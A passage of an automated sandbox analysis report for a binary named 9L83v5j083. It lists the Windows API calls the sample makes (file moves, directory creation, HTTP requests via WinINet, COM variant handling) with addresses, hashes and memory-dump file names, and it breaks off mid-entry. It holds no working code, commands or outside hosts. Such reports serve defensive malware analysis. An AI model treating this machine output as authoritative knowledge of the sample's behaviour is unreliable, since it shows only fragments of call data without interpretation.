                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 576b35986bfae084f7df425eb69122d4742048f0e58673555db969fad11c605f
                                                                                                                  • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                                  • Opcode Fuzzy Hash: 576b35986bfae084f7df425eb69122d4742048f0e58673555db969fad11c605f
                                                                                                                  • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                  • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                                  • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                  • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 978794511-0
                                                                                                                  • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                  • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                                  • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                  • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                  • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                  • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                  • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClearVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1473721057-0
                                                                                                                  • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                  • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                  • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                  • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove$_memcmp
                                                                                                                  • String ID: '$\$h
                                                                                                                  • API String ID: 2205784470-1303700344
                                                                                                                  • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                  • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                                  • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                  • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                                  • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                                  • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                                  • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                                  • __swprintf.LIBCMT ref: 0045EC33
                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                                  Strings
                                                                                                                  • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                                  • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                  • API String ID: 2441338619-1568723262
                                                                                                                  • Opcode ID: 476163c25f42cc2b6df42b4c1a678eab03b08a1666d5e5e72c4973db076654a8
                                                                                                                  • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                                  • Opcode Fuzzy Hash: 476163c25f42cc2b6df42b4c1a678eab03b08a1666d5e5e72c4973db076654a8
                                                                                                                  • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                                  APIs
                                                                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                  • String ID: @COM_EVENTOBJ
                                                                                                                  • API String ID: 327565842-2228938565
                                                                                                                  • Opcode ID: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                                                                                                                  • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                                  • Opcode Fuzzy Hash: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                                                                                                                  • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                                  APIs
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                                  • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                                    • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                                    • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                                  • String ID: H
                                                                                                                  • API String ID: 3613100350-2852464175
                                                                                                                  • Opcode ID: 0c28282c095fca606ac3af48324ca023e732c6293b9589f30defd963ae03dd36
                                                                                                                  • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                                  • Opcode Fuzzy Hash: 0c28282c095fca606ac3af48324ca023e732c6293b9589f30defd963ae03dd36
                                                                                                                  • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                                  APIs
                                                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                  • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                  • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                  • String ID: close all
                                                                                                                  • API String ID: 4174999648-3243417748
                                                                                                                  • Opcode ID: 0bb321770139098455153e9cf500394e2a6da35f1d00dd0e11ea7e6d1323a696
                                                                                                                  • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                  • Opcode Fuzzy Hash: 0bb321770139098455153e9cf500394e2a6da35f1d00dd0e11ea7e6d1323a696
                                                                                                                  • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                  APIs
                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1291720006-3916222277
                                                                                                                  • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                  • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                                  • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                  • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                  APIs
                                                                                                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                  • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                  • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                  • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                  • String ID: 0$2
                                                                                                                  • API String ID: 93392585-3793063076
                                                                                                                  • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                  • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                  • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                  • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                  APIs
                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                  • String ID: crts
                                                                                                                  • API String ID: 586820018-3724388283
                                                                                                                  • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                  • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                  • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                  • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                  • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                                  • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                                  • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 2326526234-1173974218
                                                                                                                  • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                  • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                  • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                  • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                                  • _wcslen.LIBCMT ref: 004335F2
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                  • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                  • _wcsrchr.LIBCMT ref: 00433666
                                                                                                                    • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
